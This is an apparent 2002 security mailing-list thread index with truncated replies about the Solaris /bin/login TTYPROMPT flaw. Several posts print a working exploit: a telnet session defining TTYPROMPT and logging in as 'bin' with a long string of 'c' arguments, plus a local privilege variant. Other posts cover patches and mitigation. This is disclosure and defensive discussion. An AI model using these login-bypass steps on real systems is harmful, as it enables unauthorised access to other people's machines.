Re: Solaris 2.6, 7, 8

2002-10-05 Thread Sebastian
Hi. On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). Which is plain wrong. This may be

RE: Solaris 2.6, 7, 8

2002-10-04 Thread Morgan
This is nothing more than a newly disclosed way of exploiting an old bug, hardly newsworthy unless you're in the dot slash hacking business. In the spirit of giving credit where credit is due, I'd like to note that the bug was originally found by duke (ISS/ADM) of course. This method of

Re: Solaris 2.6, 7, 8

2002-10-03 Thread tb0b
On Wed, 02 Oct 2002, you wrote: But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). I have heard several conflicting reports on this matter and there

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Roy Kidder
Works like a champ on Solaris 2.6/Sparc: -- begin -- ~ $ telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.6 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Dan Diamond
In-Reply-To: [EMAIL PROTECTED] This exploit can also be done local to gain higher priv's tester#TTYPROMPT=aa;export TTYPROMPT tester#exec login bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c/n tester:bin# Patches to resolve

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ido Dubrawsky
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote: Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan
Sorry but I can't reproduce this on a Solaris 7 machine. sunlight.ccs% telnet telnet environ define TTYPROMPT abcdef telnet o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.7 login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Marco Ivaldi
On Wed, 2 Oct 2002, buzheng wrote: I do not think this is a new bug. I completely agree. But, the remote setting of TTYPROMPT does matter. you can not succeed in login without remotely changing the TTYPROMPT. This is also the bug mentioned in Jonathan's original letter (bid:5531). That's

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan
Another thing, if you tcpwrap your telnet sessions, you can prevent localhost telnets. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 [EMAIL PROTECTED] - I have not failed. I

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Gert-Jan Hagenaars
Apparently, Dave Ahmad wrote: % % These may be fixes for this vulnerablity, however they apply to telnetd % and this vulnerability has to be in login. So it makes more sense to apply the right patches to login, and not patches to telnetd. If you only want to install the necessary patches to

Solaris 2.6, 7, 8

2002-10-02 Thread Jonathan S
Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Dave Ahmad
I have confirmed this on a fresh Solaris 8/sparc install. Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c Last login: Wed Oct 2

Re: Solaris 2.6, 7, 8

2002-10-02 Thread buzheng
I do not think this is a new bug. Actually, the overflow is not at changing the ttyprompt remotely. in fact, if you just use a, instead of abcdef, as TTYPROMPT, it will still work. the overflow is that long user name with multiple space, all the c will be taken as environment. it is the very

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Christopher X. Candreva
On Wed, 2 Oct 2002, Dave Ahmad wrote: I suggest that everyone here who still uses telnet disable it immediately. . . or install the latest Recomended patch cluster, which you should have done anyway. These may be fixes for this vulnerablity, however they apply to telnetd and this

RE: Solaris 2.6, 7, 8

2002-10-02 Thread Sinan Eren
this findings origin, i think credits must be given due... i'll be waiting for a clerification form Mr. Stuart. thanks, sinan -Original Message- From: Jonathan S [mailto:[EMAIL PROTECTED]] Sent: Wednesday, October 02, 2002 9:13 AM To: [EMAIL PROTECTED] Subject: Solaris 2.6, 7, 8 Hello